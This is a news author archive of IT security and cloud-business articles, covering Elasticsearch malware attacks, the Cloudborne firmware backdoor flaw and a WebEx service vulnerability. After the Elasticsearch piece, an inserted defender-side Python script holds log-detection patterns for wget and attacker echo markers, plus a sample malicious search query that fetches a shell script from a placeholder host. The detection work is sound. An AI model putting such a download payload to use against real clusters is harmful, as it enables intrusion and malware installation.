All posts by Rene Millman

Hackers target Elasticsearch clusters in fresh malware campaign


Rene Millman

27 Feb, 2019

Security researchers have observed a spike in attacks from multiple threat actors targeting Elasticsearch clusters, in what is believed to be attempts to place malware on victims’ machines.

Attackers appear to be targeting clusters running versions 1.4.2 and lower, leveraging old vulnerabilities to pass scripts in search queries and drop the attacker’s payloads, according to a blog post by researchers at Cisco Talos. Researchers found that both malware and cryptocurrency miners were being left on target machines.

Researchers explained that because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present.

Hackers have been consistently deploying two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget.

“This is likely an attempt to make the exploit work on a broader variety of platforms,” said researchers.

Researchers also saw a second hacker exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. “The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners,” said researchers.

A third hacker was observed downloading a file named “LinuxT” from an HTTP file server using exploits targeting CVE-2014-3120. Hosts that attempted to download the “LinuxT” sample also dropped payloads that executed the command “echo ‘qq952135763’”.

“This behaviour has been seen in Elasticsearch error logs going back several years,” said researchers.

Honeypots set up by researchers also detected additional hosts exploiting Elasticsearch to drop payloads that execute both “echo ‘qq952135763’” and “echo ‘952135763’”, suggesting that the attacks are related to the same QQ account.

“However, none of the IPs associated with these attacks have been observed attempting to download the “LinuxT” payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one,” said researchers.

Researchers said that these Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. “Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe,” warned researchers.

Organisations using Elasticsearch are urged to patch and upgrade to a newer version of Elasticsearch if at all possible.
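As an added defender-side example (not code from the article or from Talos), here are the two checks a practitioner would want after reading the above: a version test against the 1.4.2 cutoff the article gives, and a scan of request/error log lines for the indicators it names (scripted search queries that invoke wget, and the echo ‘952135763’ markers). The cluster response and log lines are constructed samples.

```python
"""Defender-side checks for the Elasticsearch campaign described in the article."""
import json
import re

# The article states the exploited flaws exist only in Elasticsearch 1.4.2 and lower.
LAST_VULNERABLE = (1, 4, 2)


def parse_version(s):
    """Turn '1.4.2' or '6.8.1' into a comparable tuple of ints (pre-release suffixes ignored)."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", s)
    if not m:
        raise ValueError(f"unrecognised version string: {s!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(root_response_json):
    """Given the JSON body a cluster returns for GET /, report whether it is in the affected range."""
    body = json.loads(root_response_json)
    return parse_version(body["version"]["number"]) <= LAST_VULNERABLE


# Indicators taken from the article: scripts passed inside search queries, wget used to
# fetch a bash script, and the echo markers tied to the same QQ account.
INDICATORS = [
    ("script_in_query", re.compile(r'"script"\s*:', re.I)),
    ("wget_download", re.compile(r"\bwget\b", re.I)),
    ("qq_marker", re.compile(r"echo\s+'?(qq)?952135763'?", re.I)),
]


def scan_log_line(line):
    """Return the names of every indicator matched by one request/error log line."""
    return [name for name, rx in INDICATORS if rx.search(line)]


def scan_log(lines):
    """Return (line_number, matched_indicators) for each line that trips at least one indicator."""
    hits = []
    for n, line in enumerate(lines, start=1):
        matched = scan_log_line(line)
        if matched:
            hits.append((n, matched))
    return hits


# Constructed sample data, not real captures; the host name is a placeholder.
SAMPLE_ROOT = '{"name":"node-1","version":{"number":"1.4.2"},"tagline":"You Know, for Search"}'
SAMPLE_LOG = [
    'POST /_search {"query":{"match_all":{}}}',
    'POST /_search {"script_fields":{"x":{"script":"... wget http://placeholder.invalid/x.sh ..."}}}',
    "ScriptException: failed to run: echo 'qq952135763'",
    "ScriptException: failed to run: echo '952135763'",
]

if __name__ == "__main__":
    print("vulnerable version:", is_vulnerable_version(SAMPLE_ROOT))
    for n, matched in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(matched)}")
```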

Bare metal flaw allows hackers to put backdoors into cloud servers


Rene Millman

27 Feb, 2019

A new flaw has been discovered by security researchers that could enable hackers to install backdoors on the firmware of bare-metal cloud servers that stay active even when the customer using the hardware has been re-assigned elsewhere.

Called “Cloudborne”, the vulnerability was first discovered by researchers at the Eclypsium Research Team, who detailed their findings in a blog post. They found that hackers could plant backdoors and malware in the firmware of a server, or in its baseboard management controller (BMC), with relative ease.

These BMCs enable remote management of a server for initial provisioning, operating system reinstall and troubleshooting. Cloudborne exploits a flaw in the hardware’s reclamation process when moving clients on and off a bare metal server.

“While physical servers are dedicated to one customer at a time, they don’t stay that way forever,” said researchers. “Servers are provisioned and reclaimed over time and naturally move from customer to customer.”

The firmware of the hardware is not reflashed in the reclamation process, allowing backdoors to persist. A hacker uses a known vulnerability in Supermicro hardware to rewrite the BMC and gain direct access to the hardware.

Researchers said that hackers “could spend a nominal sum of money for access to a server, implant malicious firmware at the UEFI, BMC, or even component level, such as in drives or network adapters. Then the attacker could release the hardware back to the service provider, which could put it back into use with another customer.”

They added that given a BMC’s ability to control the server, any compromises to that firmware can provide access to powerful tools for an attacker to exploit.

“Given the nature of the applications and data hosted on bare-metal offerings, this opens up the possibility for high-impact attack scenarios,” they said.

These scenarios include application disruption, where a malicious implant at the BMC level could permanently disable a server; data theft, as it provides attackers with another very low-level way of stealing or intercepting data; and ransomware attacks, as attackers would naturally have the ability to take hold of valuable assets.

The backdoor could also compromise other parts of cloud infrastructure. For example, hackers could send malicious IPMI commands over system interfaces from the host without the commands being authenticated.

“Since there is no authentication performed when using system interfaces, the only barrier to running arbitrary code within the BMC is whether the BMC itself performs cryptographically secure signature verification of the firmware update image before applying the update. Unfortunately, not all BMCs perform this check, and even when they do, malware can exploit vulnerabilities in the BMC firmware to bypass it,” noted researchers.

Researchers said that as firmware underlies even the host operating system and the virtualization layers of a server, any implants would naturally be able to subvert any controls and security measures running at these higher layers.

Google acquires Alooma to bolster cloud migration efforts


Rene Millman

20 Feb, 2019

Google has announced plans to buy cloud migration company Alooma in a bid to boost its cloud migration capacities.

In a blog post, Amit Ganesh, vice president of engineering at Google, said that the addition of Alooma, subject to closing conditions, “is a natural fit that allows us to offer customers a streamlined, automated migration experience to Google Cloud, and give them access to our full range of database services, from managed open source database offerings to solutions like Cloud Spanner and Cloud Bigtable”.

“This simplified migration path also opens the door for customers to take advantage of all the technologies we have to offer, including analytics, security, AI and machine learning,” he said.

Alooma was founded in 2013 and specialises in Extract, Transform, Load (ETL) applications. These enable users to pull in data from many sources, including Oracle, Azure, and SaaS providers such as Salesforce, and map this data to data warehouses such as Redshift and BigQuery.

The deal would bring ETL services to Google Cloud. Microsoft and Amazon already offer ETL services in the form of Azure Data Factory and AWS Glue respectively.

In a blog post, Yoni Broyde and Yair Weinberger, co-founders of Alooma, said the acquisition is the evolution of their company’s long-standing partnership with Google Cloud.

“It follows several native integrations, over the years, from Google Ads and Analytics to Cloud Spanner and BigQuery,” they said.

“We believe that as part of Google Cloud — bringing together the best-in-class data migration and integration services — we can make our customers and partners even more data-driven and successful.”

The co-founders added that the move would bring the company closer to delivering a full self-service database migration experience bolstered by the power of their cloud technology, including analytics, security, AI, and machine learning.

The terms of the deal were not disclosed nor was a date for when the acquisition will be finalised.

Alexa for Business now open to third-party integration


Rene Millman

26 Oct, 2018

Amazon’s Alexa voice assistant could soon be popping up on office printers and photocopiers.

The firm has announced an extension to its existing Alexa Voice Service Device SDK that would enable third-party manufacturers to add the voice assistant to their business devices.

The SDK would enable devices to sport Alexa and be managed as shared devices in organisations. Alexa for Business customers will soon be able to centrally manage and deploy supported products with Alexa built-in – whether it’s built by Amazon or third-party device makers.

The move would see the deployment of third-party devices to shared spaces such as conference rooms, hotel and dorm rooms, lobbies, kitchens, break rooms, and copy rooms, according to Sanjay Ramaswamy, a developer at Amazon.

The SDK would also enable device management as part of the device makers’ existing management flow, such as room designation, device health monitoring, and location setting. There will also be skill management, such as public and private skill assignment for shared devices without publishing to the public Alexa Skills Store.

In a blog post, Collin Davis, GM, Alexa for Business, said that customers “love using Alexa on Echo devices to simplify meeting room experiences and have asked us to enable the same experiences on their existing equipment”.

“We are excited to be working with device makers to bring the power of Alexa to our customers through the devices they already use around the office. Customers get all the benefits of Alexa for Business without having to install any new hardware,” he said.

Amazon said it was working with device makers such as Plantronics, iHome, and BlackBerry, and solution providers like Linkplay and Extron to bring Alexa to workplaces.

The Alexa for Business capabilities are provided as an extension to the AVS Device SDK, starting with version 1.10, available to download from GitHub. Device manufacturers can learn more about enabling existing Alexa built-in devices with Alexa for Business as shared devices here.

Amazon cloud revenues up by nearly a half in third quarter


Rene Millman

26 Oct, 2018

Amazon’s AWS cloud business increased by 46% year-on-year in its third financial quarter.

It made revenues of $6.68 billion in the quarter, compared with the average estimate of $6.71 billion. AWS also netted over $2 billion in profit.

Net sales for AWS for the last 12 months were $23.3 billion, and operating income for AWS was $2.077 billion, up 77% year-over-year for the third quarter ending 30 September.

In a conference call with media, Brian Olsavsky, Amazon’s chief financial officer, said that AWS had been able to keep a lid on operating costs over the past quarter due to “better efficiencies” across its network of data centres.

“We’re very happy with the growth in the business,” he said in a conference call to reporters. He added that the efficiencies in AWS’s data centres benefitted Amazon’s consumer business. Amazon has also been hiring fewer employees and adding less warehouse space.

AWS also saw a 31% operating margin in the third quarter, the highest in four years. But AWS still accounted for just 12% of Amazon’s net sales.

The company’s cloud arm continues to add features while cutting prices. In Q3 AWS cut prices on its Lightsail virtual private servers and introduced a new compute instance, T3, which the company said boasts a 30% improvement in price to performance over its precursor.

Amazon CEO Jeff Bezos said that its Amazon Business was now posting a $10 billion annual sales run rate.

“Amazon Business is adding customers rapidly, including large educational institutions, local governments, and more than half of the Fortune 100,” he said. “These organisations are choosing Amazon Business because it increases transparency into business spending and streamlines purchasing, with increased control.”

Despite the positive news, Amazon’s shares fell 8% in after-hours trading.

Remote code execution flaw found in Cisco WebEx


Rene Millman

25 Oct, 2018

Security researchers have discovered a flaw in WebEx’s WebexUpdateService that allows anyone with a login to the Windows system where Cisco’s client software is installed to run system-level code remotely.

The vulnerability is “pretty unique” as it is “a remote vulnerability in a client application that doesn’t even listen on a port”, according to a blog post by Ron Bowes and Jeff McJunkin of Counter Hack.

When the WebEx client is installed on a system, a Windows service called WebExService is also installed that can execute commands with system-level privilege.

According to a website detailing the hack, due to poorly handled access control lists (ACLs), any local or domain user can start this service over Windows’ remote service interface, except those running the client on Windows 10 (which requires an admin login).

“As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We’re calling the class “thank you for your service”, because we can, and are crossing our fingers that more are out there!” Bowes said.

Bowes said that exploiting the vulnerability is “actually easier than checking for it”.

“The patched version of WebEx still allows remote users to connect to the process and start it,” he explained. “However, if the process detects that it’s being asked to run an executable that is not signed by Webex, the execution will halt.”

In an advisory, Cisco said the vulnerability is due to insufficient validation of user-supplied parameters. “An attacker could exploit this vulnerability by invoking the update service command with a crafted argument,” said the advisory.

Bowes said that WebEx released a patch on 3 October and that users should make sure they’re running this new client version.

“The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely,” he said.

The Cisco advisory said that users could determine whether a vulnerable version of Cisco Webex Meetings Desktop App is installed on a Windows machine by launching the Cisco Webex Meetings application and clicking the gear icon in the top right of the application window, then selecting the About… menu entry. A popup window displaying the currently installed version will open.

University of Texas global database to help scientists explore effects of climate change on North Pole


Rene Millman

22 Oct, 2018

A new database has been created to help track the effects of climate change on the North Pole.

Researchers at the University of Texas at San Antonio have developed the database, called ArcCI (or Arctic CyberInfrastructure), which combines thousands of images of the Arctic Ocean taken over the years.

They said that this database would help scientists and the world see the physical changes occurring in the region, including ice loss. It is hoped that the web-based repository will enable researchers to spend more time analysing information rather than just collecting and processing data.

“This is to help scientists spend more time doing the science,” said Professor Alberto Mestas-Nuñez, one of two researchers at the University of Texas at San Antonio working on the on-demand data mining module.

“At the present time there isn’t a place on the internet that provides all these datasets but also an algorithm that allows [extraction of] information,” added Mestas. “Most of the time scientists spend time getting data and preparing it. Typically, it’s about 80% preparing the data and 20% doing the actual science. We want to break that paradigm.”

The system will enable scientists to extract information on various ice properties, including submerged ice, ice concentration, melt ponds and ice edge (the boundary between an area of ice and the open sea).

The original idea for the ArcCI database came from Professor Hongjie Xie, the principal investigator of the project at UTSA and a professor in the university’s Department of Geological Sciences. While big data analytics and dashboards have been used in many industries, this has not yet been applied to monitoring ice in the Arctic.

Xie along with Xin Miao at Missouri State University started working on the project five years ago. The project has also been funded by the National Science Foundation to develop this database that uses high-resolution imaging either obtained on-site, via satellites or via airborne monitoring.

Currently, the cloud-based system holds about a terabyte of images but will increase in the future as new images are added. The database will also integrate new algorithms as well as additional datasets as they become available.

The cloud framework and interface are being prototyped by Chaowei Yang at George Mason University, another investigator partnering with UTSA. A beta version of ArcCI will be presented at a meeting of the American Geophysical Union to be held in Washington D.C. in December 2018.